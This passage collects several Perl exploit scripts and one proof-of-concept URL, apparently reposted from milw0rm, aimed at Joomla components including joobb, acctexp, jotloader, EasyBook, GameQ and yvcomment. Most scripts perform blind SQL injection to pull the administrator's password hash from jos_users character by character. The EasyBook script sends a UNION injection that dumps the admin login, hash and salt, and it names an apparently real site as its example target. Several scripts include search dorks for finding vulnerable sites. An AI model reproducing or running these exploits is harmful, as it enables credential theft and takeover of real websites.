HaCkeR] #\n"; print " # #\n"; print " # Conctact: His0k4.hlm[at]gamil.com #\n"; print " # Greetz: All friends & muslims HacKeRs #\n"; print " # Greetz2: http://www.palcastle.org/cc :) #\n"; print " # #\n"; print " # Usage: perl jobb.pl host path <options> #\n"; print " # Example: perl jobb.pl www.host.com /joomla/ -f 1 #\n"; print " # #\n"; print " # Options: #\n"; print " # -f Forum id #\n"; print " # Note: #\n"; print " # If you need to change the match value so do it :D #\n"; print " #############################################################\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $userid = 1; my $fid = $ARGV[2]; my %options = (); GetOptions(\%options, "u=i", "p=s", "f=i"); print "[~] Exploiting...\n"; if($options{"u"}) { $userid = $options{"u"}; } if($options{"f"}) { $fid = $options{"f"}; } syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i <= 32; $i++) { my $f = 0; my $h = 48; while(!$f && $h <= 57) { if(istrue2($host, $path, $userid, $fid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$f) { $h = 97; while(!$f && $h <= 122) { if(istrue2($host, $path, $userid, $fid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } print "\n[~] Exploiting done\n"; sub istrue2 { my $host = shift; my $path = shift; my $uid = shift; my $fid = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent->new; my $query = "http://".$host.$path."index.php?option=com_joobb&view=forum&forum=".$fid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")"; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } my $resp = $ua->get($query); my $content = $resp->content; my $regexp = "Announcements"; if($content =~ /$regexp/) { return 1; } else { return 0; } } # milw0rm.com [2008-06-01] milw0rm.com
Joomla Component acctexp <= 0.12.x Blind SQL Injection Ex Code: #!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " \n"; print " #############################################################\n"; print " # Joomla Component acctexp Blind SQL Injection Exploit #\n"; print " # Author:His0k4 [ALGERIAN HaCkeR] #\n"; print " # #\n"; print " # Conctact: His0k4.hlm[at]gamil.com #\n"; print " # Greetz: All friends & muslims HacKeRs #\n"; print " # Greetz2: http://www.palcastle.org/cc :) #\n"; print " # #\n"; print " # Usage: perl acctexp.pl host path <options> #\n"; print " # Example: perl acctexp.pl www.host.com /joomla/ -g 1 #\n"; print " # #\n"; print " # Options: #\n"; print " # -g usage id #\n"; print " # Note: #\n"; print " # Don't forget to change the match if you have to do it :)#\n"; print " #############################################################\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $userid = 1; my $gid = $ARGV[2]; my %options = (); GetOptions(\%options, "u=i", "p=s", "g=i"); print "[~] Exploiting...\n"; if($options{"u"}) { $userid = $options{"u"}; } if($options{"g"}) { $gid = $options{"g"}; } syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i <= 32; $i++) { my $f = 0; my $h = 48; while(!$f && $h <= 57) { if(istrue2($host, $path, $userid, $gid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$f) { $h = 97; while(!$f && $h <= 122) { if(istrue2($host, $path, $userid, $gid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } print "\n[~] Exploiting done\n"; sub istrue2 { my $host = shift; my $path = shift; my $uid = shift; my $rid = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent->new; my $query = "http://".$host.$path."index.php?option=com_acctexp&task=subscribe&usage=".$gid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")"; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } my $resp = $ua->get($query); my $content = $resp->content; my $regexp = "Verify Password"; if($content =~ /$regexp/) { return 1; } else { return 0; } }
Joomla Component jotloader <= 1.2.1.a Blind SQL injection Code: #!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " \n"; print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n"; print " o Joomla Component jotloader Blind SQL Injection Exploit o\n"; print " o Author:His0k4 [ALGERIAN HaCkeR] o\n"; print " o o\n"; print " o Conctact: His0k4.hlm[at]gamil.com o\n"; print " o Greetz: All friends & muslims HacKeRs o\n"; print " o o\n"; print " o Dork : inurl:com_jotloader o\n"; print " o Usage: perl jotloader.pl host path <options> o\n"; print " o Example: perl jotloader.pl www.host.com /joomla/ -c 5 o\n"; print " o o\n"; print " o Options: o\n"; print " o -c valid cid id o\n"; print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $userid = 1; my $cid = $ARGV[2]; my %options = (); GetOptions(\%options, "u=i", "p=s", "c=i"); print "[~] Exploiting...\n"; if($options{"u"}) { $userid = $options{"u"}; } if($options{"c"}) { $cid = $options{"c"}; } syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i <= 32; $i++) { my $f = 0; my $h = 48; while(!$f && $h <= 57) { if(istrue2($host, $path, $userid, $cid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$f) { $h = 97; while(!$f && $h <= 122) { if(istrue2($host, $path, $userid, $cid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } print "\n[~] Exploiting done\n"; sub istrue2 { my $host = shift; my $path = shift; my $uid = shift; my $cid = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent->new; my $query = "http://".$host.$path."index.php?option=com_jotloader&cid=".$cid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")"; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } my $resp = $ua->get($query); my $content = $resp->content; my $regexp = "files.download"; if($content =~ /$regexp/) { return 1; } else { return 0; } } # milw0rm.com [2008-06-04]
Joomla Component EasyBook 1.1 SQL Injection Exploit Joomla Component EasyBook 1.1 SQL Injection Exploit Code: #!/usr/bin/perl use IO::Socket; use strict; ##### INFO############################## # Example: # # Host: artsbymonique.lu # # &md: 0f8ab366793a0d1da85c6f5a8d4fb576# ######################################## print "-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+-\n"; print "-+-- --+-\n"; print "-+-- Author: ZAMUT --+-\n"; print "-+-- Vuln: gbid= --+-\n"; print "-+-- Dork: com_easybook --+-\n\n"; print "Host:" ; chomp(my $host=<STDIN>); print "&md="; chomp(my $md=<STDIN>); my ($socket,$lhs,$l,$h,$s); $socket = IO::Socket::INET->new("$host:80") || die("Can't connecting!"); print $socket "POST /index.php HTTP/1.0\n". "Host: www.$host\n". "Content-Type: application/x-www-form-urlencoded\n". "Content-Length: 214\n\n". "option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=$md\n"; while(<$socket>) { $s = <$socket>; if($s=~/:::(.+):::/){ $lhs = $1; ($l,$h,$s)=split(':',$lhs); print "\nAdmin Login:$l\nHash:$h\nSalt:$s\n"; close $socket; exit; } } die ("Exploit failed!"); POST only
Joomla Component GameQ <= 4.0 Remote SQL injection Vulnerability Code: /---------------------------------------------------------------\ \ / / Joomla Component GameQ Remote SQL injection \ \ / \---------------------------------------------------------------/ [*] Author : His0k4 [ALGERIAN HaCkEr] [*] POC : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id={SQL} [*] Example : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14 FROM jos_users--
Joomla Component yvcomment <= 1.16 Blind SQL Injection Exploit Code: #!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " \n"; print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n"; print " o Joomla Component yvcomment Blind SQL Injection Exploit o\n"; print " o Author:His0k4 [ALGERIAN HaCkeR] o\n"; print " o o\n"; print " o Conctact: His0k4.hlm[at]gamil.com o\n"; print " o Greetz: All friends & muslims HacKeRs o\n"; print " o o\n"; print " o Dork : inurl:yvcomment o\n"; print " o Usage: perl yvcomment.pl host path <options> o\n"; print " o Example: perl yvcomment.pl www.host.com /joomla/ -a 2 o\n"; print " o o\n"; print " o Options: o\n"; print " o -a valid Article id o\n"; print " o Note: o\n"; print " o You can Change the match string by any content of the correct query o\n"; print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $userid = 1; my $aid = $ARGV[2]; my %options = (); GetOptions(\%options, "u=i", "p=s", "a=i"); print "[~] Exploiting...\n"; if($options{"u"}) { $userid = $options{"u"}; } if($options{"a"}) { $aid = $options{"a"}; } syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i <= 32; $i++) { my $f = 0; my $h = 48; while(!$f && $h <= 57) { if(istrue2($host, $path, $userid, $aid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$f) { $h = 97; while(!$f && $h <= 122) { if(istrue2($host, $path, $userid, $aid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } print "\n[~] Exploiting done\n"; sub istrue2 { my $host = shift; my $path = shift; my $uid = shift; my $aid = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent->new; my $query = "http://".$host.$path."index.php?option=com_yvcomment&view=comment&ArticleID=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=".$h.""; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } my $resp = $ua->get($query); my $content = $resp->content; my $regexp = "DateAndAuthor"; if($content =~ /$regexp/) { return 1; } else { return 0; } } # milw0rm.com [2008-06-08]
